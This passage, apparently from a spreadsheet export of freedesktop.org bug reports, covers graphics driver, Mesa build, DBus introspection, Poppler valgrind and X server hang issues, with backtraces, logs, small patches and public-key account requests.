    <t>Using radeonhd I got a double mouse pointer effect after resume from s2disk. Two mouse pointers shew up and moved in unison on congruent paths. However only one of them was functional. Even worse the functional mouse pointer disappeared in certain screen areas/ sometimes. It is very similar to what I have reported  some years ago for Lonni J. Friedman with the proprietary Nvidia driver think it was xorg-x11-driver-video-radeonhd-1.2.5_20091001_be7216f-13.1.</t>
  </si>
  <si>
    <t>XORG-39901</t>
  </si>
  <si>
    <t>4 monitors on two graphic cards GeRorce 450 does not work</t>
  </si>
  <si>
    <t>Created attachment 50013
config files logs and pictures of configuration
Hi
I am unable to create a working configuration with 4 monitors on 2 GeForce 450 (dual headed). I am able to make it working with 3 monitors - see xorg.conf.tripple. The log file is xorg.0.log.tripple. The configuration works also with Xinerama - see monitor-tripple.jpg.
When I add 4th display into the configuration (the same way as 2nd and 3rd) the X doesn't start - see xorg.conf.quadro. No specific error message in the system or xorg log - see xorg.0.log.quadro.
I also tried to configure it with proprietary nvidia drivers - I can start X with 4 separate screens but as soon as I enable Xinerama the desktop is shifted to the most right monitor and I must click on the first monitor to be provided on the last one (even for two monitors) - see monitor-nvidia.jpg (selection is on right monitor a mouse cursor on the left one - so there is an offset of a whole monitor). With 4 monitors the offset is 3 monitors :-( 
So I see it as a bug that I am not able to enhance a working dual configuration into quadro one. Neither with nvidia nor nouveau drivers. 
I have this config:
X version:
X.Org X Server 1.10.1
Release Date: 2011-04-15
X Protocol Version 11 Revision 0
Build Operating System: Linux 2.6.24-27-server i686 Ubuntu
Current Operating System: Linux harfa 2.6.38-10-generic-pae #46-Ubuntu SMP Tue Jun 28 16:54:49 UTC 2011 i686
Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.38-10-generic-pae root=UUID=2e66a48e-ff81-4e7f-8a24-b4f5dd2425a4 ro vmalloc=512M quiet splash vt.handoff=7
Build Date: 21 May 2011  11:38:35AM
xorg-server 2:1.10.1-1ubuntu1.1 (For technical support please see http://www.ubuntu.com/support) 
Current version of pixman: 0.20.2
	Before reporting problems check http://wiki.x.org
	to make sure that you have the latest version.
lspci:
01:00.0 VGA compatible controller: nVidia Corporation GF106 [GeForce 450 GTS] (rev a1)
01:00.1 Audio device: nVidia Corporation GF106 High Definition Audio Controller (rev a1)
02:00.0 VGA compatible controller: nVidia Corporation GF106 [GeForce 450 GTS] (rev a1)
02:00.1 Audio device: nVidia Corporation GF106 High Definition Audio Controller (rev a1)
Regards
Vaclav</t>
  </si>
  <si>
    <t>DBUS-8607</t>
  </si>
  <si>
    <t>introspection crashes when object has properties</t>
  </si>
  <si>
    <t>Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1208330560 (LWP 5209)]
write_interface (key=0x804f320 val=0x859ac80 user_data=0xbfdaa3c4) at
dbus-gobject.c:456
456           s = _dbus_gutils_wincaps_to_uscore (spec-&gt;name)
(gdb) bt
#0  write_interface (key=0x804f320 val=0x859ac80 user_data=0xbfdaa3c4) at
dbus-gobject.c:456
#1  0x004ff826 in IA__g_hash_table_foreach (hash_table=0x85956a0 func=0x2323f0
    user_data=0xbfdaa3c4) at ghash.c:662
#2  0x00232e2f in handle_introspect (connection=0x85973f8 message=0x85977c8
object=0x859b460) at dbus-gobject.c:583
#3  0x00235014 in gobject_message_function (connection=0x85973f8
message=0x85977c8 user_data=0x859b460)
    at dbus-gobject.c:1296
#4  0x006be019 in _dbus_object_tree_dispatch_and_unlock (tree=0x8597258
message=0x85977c8) at dbus-object-tree.c:842
#5  0x006a884c in dbus_connection_dispatch (connection=0x85973f8) at
dbus-connection.c:3820
#6  0x002312ad in message_queue_dispatch (source=0x8598dd0 callback=0
user_data=0x0) at dbus-gmain.c:101
#7  0x0050c602 in IA__g_main_context_dispatch (context=0x8598d50) at gmain.c:2045
#8  0x0050f5cf in g_main_context_iterate (context=0x8598d50 block=1
dispatch=1 self=0x8592ca0) at gmain.c:2677
#9  0x0050f979 in IA__g_main_loop_run (loop=0x859c538) at gmain.c:2881
#10 0x0804a3b4 in main (argc=1 argv=0xbfdaa9b4) at main.c:124</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-10131</t>
  </si>
  <si>
    <t>Stop mentioning ROX in the update-mime-database manpage under See Also</t>
  </si>
  <si>
    <t>Hi
the attached patch removes ROX from the See Also section of the update-mime-database. Readers of the update-mime-database manpage don't get any additional relevant informations when looking at the ROX manpage.
Bye</t>
  </si>
  <si>
    <t>PIGLIT-53297</t>
  </si>
  <si>
    <t>piglit hang during/after glsl-light-model test</t>
  </si>
  <si>
    <t>Noted while running the piglit test suite on a powerpc system.   glsl-light-model test reported fail and glsl related processes appear to be stuck in a loop.
# ./piglit-run.py tests/all.tests results/all_llvmpipe.aug7.-3
...
[Tue Aug  7 22:20:02 2012] ::  running :: spec/EXT_framebuffer_multisample/interpolation 4 centroid-edges
[Tue Aug  7 22:20:02 2012] ::     fail :: spec/EXT_framebuffer_multisample/interpolation 4 centroid-edges
[Tue Aug  7 22:20:02 2012] ::  running :: shaders/glsl-light-model
[Tue Aug  7 22:20:02 2012] ::     fail :: shaders/glsl-light-model
# ps auxw | grep piglit
root      9113 99.7  1.7 117056 36672 ?        Rl+  Aug07 2373:07 /builddir/piglit/framework/../bin/shader_runner tests/shaders/glsl-vs-vec4-indexing-temp-src-in-nested-loop-combined.shader_test -auto -fbo
root     10524 99.7  1.7 116928 36480 ?        Rl+  Aug07 2373:45 /builddir/piglit/framework/../bin/shader_runner tests/shaders/glsl-vs-vec4-indexing-temp-src-in-nested-loop-inner.shader_test -auto -fbo
root     12488 99.9  0.0 182208  1088 ?        R    Aug02 9574:02 /builddir/piglit/framework/../bin/fs-discard-exit-2 -auto -fbo
root     12490 95.3  0.0 181440     0 ?        R    Aug02 9136:20 /builddir/piglit/framework/../bin/shader_runner tests/spec/glsl-1.30/execution/fs-discard-exit-1.shader_test -auto -fbo
root     16386 99.1  1.8 115904 37056 ?        Rl+  Aug07 2357:10 /builddir/piglit/framework/../bin/shader_runner tests/shaders/glsl-vs-loop-300.shader_test -auto -fbo
root     18210  0.7  2.2 260864 45376 ?        Sl+  Aug07  18:56 python ./piglit-run.py tests/all.tests results/all_llvmpipe_aug7.-3
root     18906 58.9  1.8 116928 36864 ?        tl+  Aug07 1402:08 /builddir/piglit/framework/../bin/shader_runner tests/shaders/glsl-vs-vec4-indexing-temp-src-in-nested-loop-outer.shader_test -auto -fbo
root     22419 99.8  1.8 116864 37120 ?        Rl+  Aug07 2372:41 /builddir/piglit/framework/../bin/shader_runner tests/shaders/glsl-vs-vec4-indexing-temp-src-in-loop.shader_test -auto -fbo
root     24694 99.7  1.8 117568 36928 ?        Rl+  Aug07 2375:11 /builddir/piglit/framework/../bin/shader_runner tests/shaders/glsl-vs-vec4-indexing-temp-dst-in-nested-loop-combined.shader_test -auto -fbo
root     25172 99.7  1.8 117056 36928 ?        Rl+  Aug07 2375:08 /builddir/piglit/framework/../bin/shader_runner tests/shaders/glsl-vs-vec4-indexing-temp-dst-in-loop.shader_test -auto -fbo
root     30454 99.8  1.7 115968 35840 ?        Rl+  Aug07 2375:04 /builddir/piglit/framework/../bin/shader_runner tests/shaders/glsl-vs-loop-redundant-condition.shader_test -auto -fbo
root     30594 99.7  1.7 116160 36032 ?        Rl+  Aug07 2374:46 /builddir/piglit/framework/../bin/shader_runner tests/shaders/glsl-vs-loop-continue.shader_test -auto -fbo
root     31053 99.7  1.7 115904 36096 ?        Rl+  Aug07 2374:38 /builddir/piglit/framework/../bin/shader_runner tests/shaders/glsl-vs-copy-propagation-1.shader_test -auto -fbo
Attaching to the threads with gdb and gathering backtraces did not reveal as much as I had hoped it would.   Most threads are:
(gdb) bt full
#0  0xf3a017a0 in ?? ()
No symbol table info available.
#1  0x0ed0b47c in llvm_pipeline_generic (middle=0xfffd76c0 fetch_info=0x7a0 prim_info=0x7b0) at draw/draw_pt_fetch_shade_pipeline_llvm.c:249
        fpme = 0xfffd76c0
        draw = 0x0
        gshader = 0xfffd8100
        gs_prim_info = {linear = 16 '\020' start = 272613932 elts = 0x103c0500 count = 675562532 prim = 1036831949 flags = 3 
          primitive_lengths = 0x4 primitive_count = 272395784}
        llvm_vert_info = {verts = 0xfffd7e38 vertex_size = 272613596 stride = 272610320 count = 272610640}
        gs_vert_info = {verts = 0x102247ac vertex_size = 0 stride = 270681088 count = 4294802520}
        vert_info = 
        opt = 4294803712
        clipped = 0
        __FUNCTION__ = llvm_pipeline_generic
#2  0x00000000 in ?? ()
No symbol table info available.
single-stepping through that shows we appear to be in a loop waiting for r3 to go to zero.
(gdb) 
0xf3d30acc in ?? ()
=&gt; 0xf3d30acc:  80 7f 00 d4     lwz     r3212(r31)
...
=&gt; 0xf3d30cbc:  28 03 00 00     cmplwi  r30
(gdb) info reg r3
r3             0xffffffff       4294967295
...
I'll guess this is a futex or spinlock related refcount of some sort.   since it's been spinning for a day+ already I expect we're not coming out. :-)
One thread being notably different with a deep callstack:
# gdb /builddir/piglit/bin/shader_runner 12488
...
(gdb) bt
#0  0x0ec8fdb0 in ?? ()
#1  0x0ec8fd0c in ?? ()
#2  0x0ec91bac in ?? ()
#3  0x0ec937d8 in ?? ()
#4  0x0ec95488 in ?? ()   &lt;---
#5  0x0ea65f08 in ?? ()
#6  0x0ea51df0 in ?? ()
#7  0x0ea54d78 in ?? ()
#8  0x0ea552c0 in ?? ()
#9  0x0ea55c84 in ?? ()
#10 0x0ea4dae0 in ?? ()
#11 0x0ecfed40 in ?? ()
#12 0x0ec77ee4 in ?? ()
#13 0x0ec77fd4 in ?? ()
#14 0x0ec7baec in ?? ()
#15 0x0ec76314 in ?? ()
#16 0x0ec76740 in ?? ()
#17 0x0ea4d3ec in ?? ()
#18 0x0eb473c4 in ?? ()
#19 0x0eb3f710 in ?? ()
#20 0x0f51f648 in ?? ()
#21 0x0feb49f4 in ?? ()
#22 0x0ff2a414 in ?? ()
#23 0x10000c74 in ?? ()
#24 0x0fe9e668 in ?? ()
#25 0x0fe9e0b8 in ?? ()
#26 0x10000aa8 in ?? ()
#27 0x0f8111d4 in ?? ()
#28 0x0f811390 in ?? ()
#29 0x00000000 in ?? ()
(gdb)
single-stepping for a while suggests we are stuck within the function seen at #4 in the above backtrace. (0x0ec95488).</t>
  </si>
  <si>
    <t>will_schmidt</t>
  </si>
  <si>
    <t>XORG-5586</t>
  </si>
  <si>
    <t>overlay scaler limited to 720 pixels on ATI Rage Pro (mach64)</t>
  </si>
  <si>
    <t>Overview Description: 
Video playback through Xv on All-in-Wonder Pro (Rage Pro
mach64) works only if horizontal resolution of video file does not
exceed 720 pixels.
Steps to Reproduce:
Play some video file (using e.g. mplayer) which is wider than 720 pixels.
mplayer -vo xv some_768x576_file.mpg
Actual Results:
If video is wider than 720 pixels no video will be displayed.
All that gets displayed is rectangle filled with key color.
Expected Results:
Video should be displayed.
Build Date and Platform:
My setup: Mandriva Linux 2006.0 with X.org cvs20050915.
Hardware: 
	cpu: AMD Duron 1800 
	motherboard: Chaintech 7VJDA 
	video: ATI All-in-Wonder Pro (Rage Pro mach64 8 MB of memory).
Excerpts from Xorg.0.log:
X Window System Version 6.8.99.900 (6.9.0 RC 0)
Release Date: 01 August 2005 + cvs
(--) PCI:*(0:10:0) ATI Technologies Inc 3D Rage Pro rev 92 Mem @ 0xe4000000/24
0xe6000000/12 I/O @ 0xd000/8
(--) ATI(0): ATI 3D Rage Pro graphics controller detected.
(--) ATI(0): Chip type 4749 GI version 4 foundry UMC class 0 revision 0x01.
(--) ATI(0): PCI bus interface detected  block I/O base is 0xD000.
(--) ATI(0): ATI Mach64 adapter detected.
Additional Information:
In Mandrake Linux 10.0 + XFree 4.3.0 + ati.2 drivers from
http://gatos.sourceforge.net there was no such problem.
I have posted description of this problem on the xorg mailing list:
http://lists.freedesktop.org/archives/xorg/2006-January/012175.html
Respond from Ville Syrjala (
http://lists.freedesktop.org/archives/xorg/2006-January/012191.html ):
The max horizontal resolution depends on the chip type. It's 384 for 
VT/GT rev A 768 for Rage Pro/LT Pro and 720 for all other chip types. 
The specs don't state the limits very clearly but I have verified those 
limits on numerous chips while writing the DirectFB driver.
It looks like the Xv driver has wrong vertical resolution limit as well. 
The hardware limit is 1024 but the driver allows resolutions up to 2048.
These limits are set in atimach64xv.c. Also the number 720 appears
in atiscreen.c (don't know if this matters).
I have patched atimisc_drv.so binary (replaced all occurences of
720 with 768) and it started working.</t>
  </si>
  <si>
    <t>pakman_</t>
  </si>
  <si>
    <t>DRI-69671</t>
  </si>
  <si>
    <t>rv790 hdmi sound regression since fix audio dto calculation on DCE3+ (v3)</t>
  </si>
  <si>
    <t>My rv790 has lost sound over hdmi since -
1518dd8efd47918bb269f1470030592875953f6c is the first bad commit
commit 1518dd8efd47918bb269f1470030592875953f6c
Author: Alex Deucher 
Date:   Tue Jul 30 17:31:07 2013 -0400
    drm/radeon: fix audio dto calculation on DCE3+ (v3)
    Need to set the wallclock ratio and adjust the phase
    and module registers appropriately.  May fix problems
    with audio timing at certain display timings.
    v2: properly handle clocks below 24mhz
    v3: rebase r600 changes
Tested with 441k and 48k source screen 50Hz.</t>
  </si>
  <si>
    <t>MESA-64392</t>
  </si>
  <si>
    <t>Missing WAYLAND_CFLAGS in Gallium GBM state-tracker</t>
  </si>
  <si>
    <t>Created attachment 79053
WAYLAND_CFLAGS are missed in Makefile.am
Compiling Mesa fails with '--enable-gallium-gbm' flag because it can't locate wayland-server.h
    make[3]: Leaving directory `/home/bartex/wayland/mesa-git/src/gallium/state_trackers/dri'
    Making all in gbm
    make[3]: Entering directory `/home/bartex/wayland/mesa-git/src/gallium/state_trackers/gbm'
      CC     gbm_drm.lo
    In file included from gbm_drm.c:40:0:
    ../../../egl/wayland/wayland-drm/wayland-drm.h:4:28: fatal error: wayland-server.h: No such file or directory
    compilation terminated.
    make[3]: *** [gbm_drm.lo] Error 1
    make[3]: Leaving directory `/home/bartex/wayland/mesa-git/src/gallium/state_trackers/gbm'
    make[2]: *** [all-recursive] Error 1
    make[2]: Leaving directory `/home/bartex/wayland/mesa-git/src/gallium/state_trackers'
    make[1]: *** [all-recursive] Error 1
    make[1]: Leaving directory `/home/bartex/wayland/mesa-git/src'
    make: *** [all-recursive] Error 1
Attached patch for fixing.</t>
  </si>
  <si>
    <t>bartosz.szczepanski</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-99232</t>
  </si>
  <si>
    <t>Correct PostScript capitalization</t>
  </si>
  <si>
    <t>PostScript is spelled incorrectly in Postscript type-1 font (file freedesktop.org.xml.in.h line 194). It should have capital 'S'.</t>
  </si>
  <si>
    <t>MESA-6979</t>
  </si>
  <si>
    <t>r300_vertexprog.c unknown output 3</t>
  </si>
  <si>
    <t>when I play to ppracer I get a 
(c) 2004-2005 The PPRacer team
(c) 1999-2001 Jasmin F. Patry
PPRacer comes with ABSOLUTELY NO WARRANTY. This is free software
and you are welcome to redistribute it under certain conditions.
See http://www.gnu.org/copyleft/gpl.html for details.
Mesa: CPU vendor: GenuineIntel
Mesa: CPU name:               Intel(R) Pentium(R) 4 CPU 3.00GHz
Mesa: MMX cpu detected.
Mesa: SSE cpu detected.
Mesa: Not testing OS support for SSE leaving enabled.
open /dev/sequencer: No such file or directory
*********************************WARN_ONCE*********************************
File r300_vertexprog.c function t_dst_index line 178
Unknown output 3
***************************************************************************
DATA:
Debian SID
Xorg version 7.0.0
Mesa 6.5.1 CVS
RADEON(0): [dri] Found DRI library version 1.2.0 and kernel module version 1.24.0
0000:01:00.1 Display controller: ATI Technologies Inc Radeon X600(RV380)
kernel 2.6.17-rc4
If you need more information/test drop me a call :-)
Please cc me I not susbcribed!</t>
  </si>
  <si>
    <t>perico_292003</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-35295</t>
  </si>
  <si>
    <t>Created attachment 44437
GPG Public Key
Hi
I'd like to have an FDO account please.
This is for contributing to various projects but primarily PulseAudio which we soon hope to host here.
Real Name: Colin Guthrie
Email: fdo (at) colin (dot) guthr (dot) ie
 or
Email: colin (at) guthr (dot) ie
The former is the address I use here but the latter is the one I use on my GPG key. Pick whatever is best for you :)</t>
  </si>
  <si>
    <t>FONTCONFIG-24744</t>
  </si>
  <si>
    <t>No n'ko orthography</t>
  </si>
  <si>
    <t>fc-query does not report any coverage for N'ko even though we have fonts like dejavu sans that include it</t>
  </si>
  <si>
    <t>XORG-1212</t>
  </si>
  <si>
    <t>dlloader will not work when LD_BIND_NOW=1</t>
  </si>
  <si>
    <t>i've heard several reports now from people trying to manually sort out module
load order for dlloader which is in many cases unpossible.  this should never
happen so i suspect they're setting LD_BIND_NOW somewhere without realizing it.
 cheesy one-off patch to work around this to follow.</t>
  </si>
  <si>
    <t>XORG-14692</t>
  </si>
  <si>
    <t>Modules need some way of controlling Xinerama visual consolidation</t>
  </si>
  <si>
    <t>Git commit ee21aba6 removed PanoramiXVisualTable which was the pre-ABI4 mechanism for drivers &amp; modules to control Xinerama visual consolidation.  GLX (and possibly other modules) needs to be able to have a say in which visuals are considered equal in PanoramiXConsolidate.</t>
  </si>
  <si>
    <t>TANGO-11507</t>
  </si>
  <si>
    <t>[icon-naming-utils] create legacy link tools-check-spelling --&gt; gtk-spell-check</t>
  </si>
  <si>
    <t>Really useful legacy icon to link.
Patch will come.</t>
  </si>
  <si>
    <t>XORG-18150</t>
  </si>
  <si>
    <t>evdev detects non-existing button as mouse button</t>
  </si>
  <si>
    <t>In Ubuntu Intrepid on amd64 my gamepad and joystick are detected by evdev as mouse. Therefore they act as mouse pointer and cannot be used as joystick.
I changed evdev to log the buttons it found. This reported a non-existing button 287. As 287 &lt; BTN_JOYSTICK evdev considers it a mouse button and configures the device as mouse. However there is no physical button that actually generates code 287.
Searching further I found TestBit(287 key_bitmask) reported strange values. I expected either 0 if bit 287 is not set or 2^31 if the bit is set. However TestBit returned for example 140636556623872.
That suggests the bitmask used by TestBit is not correct.
Changing:
#define TestBit(bit array) (array[(bit) / LONG_BITS]) &amp; (1 &lt;&lt; ((bit) % LONG_BITS))
Into:
#define TestBit(bit array) (array[(bit) / LONG_BITS]) &amp; (1l &lt;&lt; ((bit) % LONG_BITS))
(note the 1l instead of 1)
in src/evdev.c solved the problem for me. Evdev no longer sees button 287. When I connect the gamepad evdev now logs:
(II) config/hal: Adding input device Logitech Logitech RumblePad 2 USB
(**) Logitech Logitech RumblePad 2 USB: always reports core events
(**) Logitech Logitech RumblePad 2 USB: Device: /dev/input/event2
(II) Logitech Logitech RumblePad 2 USB: Found x and y absolute axes
(WW) Logitech Logitech RumblePad 2 USB: Don't know how to use device
(II) UnloadModule: evdev
(EE) PreInit returned NULL for Logitech Logitech RumblePad 2 USB
(EE) config/hal: NewInputDeviceRequest failed
and the gamepad and joystick can be used in jscalibrator and flightgear.</t>
  </si>
  <si>
    <t>albrt</t>
  </si>
  <si>
    <t>HAL-10230</t>
  </si>
  <si>
    <t>configure does not check for expat</t>
  </si>
  <si>
    <t>I tried to build hal on a machine without expat.
configure passed make failed when a *.c file were not able to read expat.h.
I guess configure should check for expat.h.</t>
  </si>
  <si>
    <t>PULSEAUDIO-106982</t>
  </si>
  <si>
    <t>pulseaudio-12.0/src/pulsecore/sink-input.c:2017: confused logic ?</t>
  </si>
  <si>
    <t>pulseaudio-12.0/src/pulsecore/sink-input.c:2017]: (style) Redundant condition: If 'EXPR == 1' the comparison 'EXPR != 2' is always true.
Source code is
    if ((state == PA_SINK_INPUT_DRAINED || state == PA_SINK_INPUT_RUNNING) &amp;&amp;
        !(i-&gt;thread_info.state == PA_SINK_INPUT_DRAINED || i-&gt;thread_info.state != PA_SINK_INPUT_RUNNING))</t>
  </si>
  <si>
    <t>XORG-16063</t>
  </si>
  <si>
    <t>xrandr returns nothing on RS480 but the current working resolution</t>
  </si>
  <si>
    <t>Latest 6.8.0 ati driver makes xrandr shows nothing while with the same configuration previous drivers mades xrandr shows all possible resolution:
$ xrandr
Screen 0: minimum 320 x 200 current 1280 x 1024 maximum 1600 x 1200
VGA-0 disconnected 1280x1024+0+0 (normal left inverted right x axis y axis) 0mm x 0mm
DVI-0 disconnected (normal left inverted right x axis y axis)
  1280x1024 (0x4e)   90.8MHz
        h: width  1280 start 1328 end 1360 total 1440 skew    0 clock   63.0KHz
        v: height 1024 start 1027 end 1034 total 1054           clock   59.8Hz
It only shows the current working resolution</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-15944</t>
  </si>
  <si>
    <t>cgit.freedesktop.org doesn't display swfdec repositories</t>
  </si>
  <si>
    <t>see topic ^^</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-8825</t>
  </si>
  <si>
    <t>porting Xft to XCB backend</t>
  </si>
  <si>
    <t>I am porting xft to xcb backend in progressand i have explained it at
  http://lists.freedesktop.org/archives/xcb/2006-October/002193.html
SSH public keys:
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEArYRUz/utDTPQ4AEYD5myVMyIwCVLHOBnZQNvA7+n09qchRGhqPKhp9G6KxAFqPEl5Mxy2KZBNlq/nQl6B+OLw82O6uPopxnBK9jt/t+TmhTX20IFIE7cNlOPiwq3TfJDaXw+dKu6JCQjvegLyWAaZ+0Z7CVxzitpGP/T5ONW0nc=
jianjuny@yjj
GPG public keys:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.1 (GNU/Linux)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=sGqK
-----END PGP PUBLIC KEY BLOCK-----</t>
  </si>
  <si>
    <t>supermaper</t>
  </si>
  <si>
    <t>MESA-95180</t>
  </si>
  <si>
    <t>rasterizer/memory/Convert.h:170:9: error: â€˜__builtin_isnanâ€™ is not a member of â€˜stdâ€™</t>
  </si>
  <si>
    <t>mesa: 32cb7d61a908c519641959158de0a44fd2c8a6e7 (master 11.3.0-devel)
  CXX      rasterizer/memory/libswrAVX_la-ClearTile.lo
In file included from rasterizer/memory/ClearTile.cpp:34:0:
./rasterizer/memory/Convert.h: In function â€˜uint16_t Convert32To16Float(float)â€™:
./rasterizer/memory/Convert.h:170:9: error: â€˜__builtin_isnanâ€™ is not a member of â€˜stdâ€™
     if (std::isnan(val))
         ^
./rasterizer/memory/Convert.h:170:9: note: suggested alternative:
: note:   â€˜__builtin_isnanâ€™</t>
  </si>
  <si>
    <t>POPPLER-102117</t>
  </si>
  <si>
    <t>valgrind reports use of uninitialized values</t>
  </si>
  <si>
    <t>Created attachment 133379
pdf file to trigger the error message
I am using Okular and poppler both from today's git master to show a simple pdf file generated by LibreOffice.  Valgrind gives me a Conditional jump or move depends on uninitialised value(s) error.  The error occurs in the method Object::free() so this may be caused by the recent better_object merger.
Complete valgrind trace:
==978== Memcheck a memory error detector
==978== Copyright (C) 2002-2017 and GNU GPL'd by Julian Seward et al.
==978== Using Valgrind-3.13.0 and LibVEX rerun with -h for copyright info
==978== Command: /home/sander/okular-local-poppler-inst/bin/okular /home/sander/tmp/hallo-welt.pdf
==978== 
==978== Thread 5 Okular::TextPage:
==978== Conditional jump or move depends on uninitialised value(s)
==978==    at 0x23454341: Object::free() (Object.cc:129)
==978==    by 0x23472C7F: setToNull (Object.h:177)
==978==    by 0x23472C7F: XRef::copy() (XRef.cc:426)
==978==    by 0x23459AE0: Page::displaySlice(OutputDev* double double int bool bool int int int int bool bool (*)(void*) void* bool (*)(Annot* void*) void* bool) (Page.cc:547)
==978==    by 0x230DB57C: Poppler::Page::textList(Poppler::Page::Rotation) const (poppler-page.cc:587)
==978==    by 0x22E5F8D9: PDFGenerator::textPage(Okular::Page*) (in /home/sander/okular-local-poppler-inst/lib/x86_64-linux-gnu/plugins/okular/generators/okularGenerator_poppler.so)
==978==    by 0x1CA9F966: Okular::TextPageGenerationThread::run() (in /home/sander/okular-local-poppler/build/libOkular5Core.so.7.0.0)
==978==    by 0x8A9AC27: ??? (in /usr/lib/x86_64-linux-gnu/libQt5Core.so.5.7.1)
==978==    by 0xAAE1493: start_thread (pthread_create.c:333)
==978==    by 0x983EA8E: clone (clone.S:97)
==978== 
==978== Thread 4 Okular::PixmapGe:
==978== Conditional jump or move depends on uninitialised value(s)
==978==    at 0x23454341: Object::free() (Object.cc:129)
==978==    by 0x23472C7F: setToNull (Object.h:177)
==978==    by 0x23472C7F: XRef::copy() (XRef.cc:426)
==978==    by 0x23459AE0: Page::displaySlice(OutputDev* double double int bool bool int int int int bool bool (*)(void*) void* bool (*)(Annot* void*) void* bool) (Page.cc:547)
==978==    by 0x230DC222: Poppler::Page::renderToImage(double double int int int int Poppler::Page::Rotation) const (poppler-page.cc:369)
==978==    by 0x22E5F34C: PDFGenerator::image(Okular::PixmapRequest*) (in /home/sander/okular-local-poppler-inst/lib/x86_64-linux-gnu/plugins/okular/generators/okularGenerator_poppler.so)
==978==    by 0x1CA9F7FC: Okular::PixmapGenerationThread::run() (in /home/sander/okular-local-poppler/build/libOkular5Core.so.7.0.0)
==978==    by 0x8A9AC27: ??? (in /usr/lib/x86_64-linux-gnu/libQt5Core.so.5.7.1)
==978==    by 0xAAE1493: start_thread (pthread_create.c:333)
==978==    by 0x983EA8E: clone (clone.S:97)
==978== 
==978== Thread 1:
==978== Syscall param writev(vector[...]) points to uninitialised byte(s)
==978==    at 0x9836E4D: ??? (syscall-template.S:84)
==978==    by 0xB6AC41C: ??? (in /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0)
==978==    by 0xB6AC81C: ??? (in /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0)
==978==    by 0xB6ACAB6: ??? (in /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0)
==978==    by 0xB6AD2CB: xcb_flush (in /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0)
==978==    by 0x139E5C9F: QXcbWindow::hide() (in /usr/lib/x86_64-linux-gnu/libQt5XcbQpa.so.5.7.1)
==978==    by 0x852EDAB: QWindow::setVisible(bool) (in /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5.7.1)
==978==    by 0x7F669F6: QWidgetPrivate::hide_sys() (in /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5.7.1)
==978==    by 0x7F6D03C: QWidgetPrivate::hide_helper() (in /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5.7.1)
==978==    by 0x7F71A5F: QWidget::setVisible(bool) (in /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5.7.1)
==978==    by 0x7F6D4D7: QWidgetPrivate::close_helper(QWidgetPrivate::CloseMode) (in /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5.7.1)
==978==    by 0x8099880: ??? (in /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5.7.1)
==978==  Address 0x13417751 is 4545 bytes inside a block of size 21152 alloc'd
==978==    at 0x4C2DC05: calloc (vg_replace_malloc.c:711)
==978==    by 0xB6ABDCB: xcb_connect_to_fd (in /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0)
==978==    by 0xB6AFD28: xcb_connect_to_display_with_auth_info (in /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0)
==978==    by 0xB39FE89: _XConnectXCB (in /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0)
==978==    by 0xB390BC1: XOpenDisplay (in /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0)
==978==    by 0x139D06A4: QXcbConnection::QXcbConnection(QXcbNativeInterface* bool unsigned int char const*) (in /usr/lib/x86_64-linux-gnu/libQt5XcbQpa.so.5.7.1)
==978==    by 0x139D3E5D: QXcbIntegration::QXcbIntegration(QStringList const&amp; int&amp; char**) (in /usr/lib/x86_64-linux-gnu/libQt5XcbQpa.so.5.7.1)
==978==    by 0x40274AC: ??? (in /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so)
==978==    by 0x851042C: QPlatformIntegrationFactory::create(QString const&amp; QStringList const&amp; int&amp; char** QString const&amp;) (in /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5.7.1)
==978==    by 0x851E767: QGuiApplicationPrivate::createPlatformIntegration() (in /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5.7.1)
==978==    by 0x851F2EC: QGuiApplicationPrivate::createEventDispatcher() (in /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5.7.1)
==978==    by 0x8C6DCCE: QCoreApplicationPrivate::init() (in /usr/lib/x86_64-linux-gnu/libQt5Core.so.5.7.1)
==978== 
No frame loaded
No frame loaded
No frame loaded
==978== 
==978== HEAP SUMMARY:
==978==     in use at exit: 381719 bytes in 4803 blocks
==978==   total heap usage: 265082 allocs 260279 frees 109539013 bytes allocated
==978== 
==978== LEAK SUMMARY:
==978==    definitely lost: 7416 bytes in 38 blocks
==978==    indirectly lost: 9681 bytes in 165 blocks
==978==      possibly lost: 0 bytes in 0 blocks
==978==    still reachable: 364622 bytes in 4600 blocks
==978==         suppressed: 0 bytes in 0 blocks
==978== Rerun with --leak-check=full to see details of leaked memory
==978== 
==978== For counts of detected and suppressed errors rerun with: -v
==978== Use --track-origins=yes to see where uninitialised values come from
==978== ERROR SUMMARY: 71 errors from 3 contexts (suppressed: 0 from 0)</t>
  </si>
  <si>
    <t>XORG-17011</t>
  </si>
  <si>
    <t>setxkbmap hangs X server in Popen(/usr/bin/xkbcomp...)</t>
  </si>
  <si>
    <t>Created attachment 18160
gdb backtrace of the xserver
When I try to use setxkbmap the X server hangs and uses 99% CPU
Parameters to setxkbmap do not change the effect.
This is the command that is run by the Xserver:
\/usr/bin/xkbcomp\ -w 1 \-R/usr/share/X11/xkb\ -xkm \-\ -em1 \The XKEYBOARD keymap compiler (xkbcomp) reports:\ -emp \&gt; \ -eml \Errors from xkbcomp are not fatal to the X server\ \/var/lib/xkb/server-0.xkm\ 
running it manually with 'eval \/usr/bin/xkbcomp\ -w1 ...' the command itself hangs. No cpu usage no disk usage.</t>
  </si>
  <si>
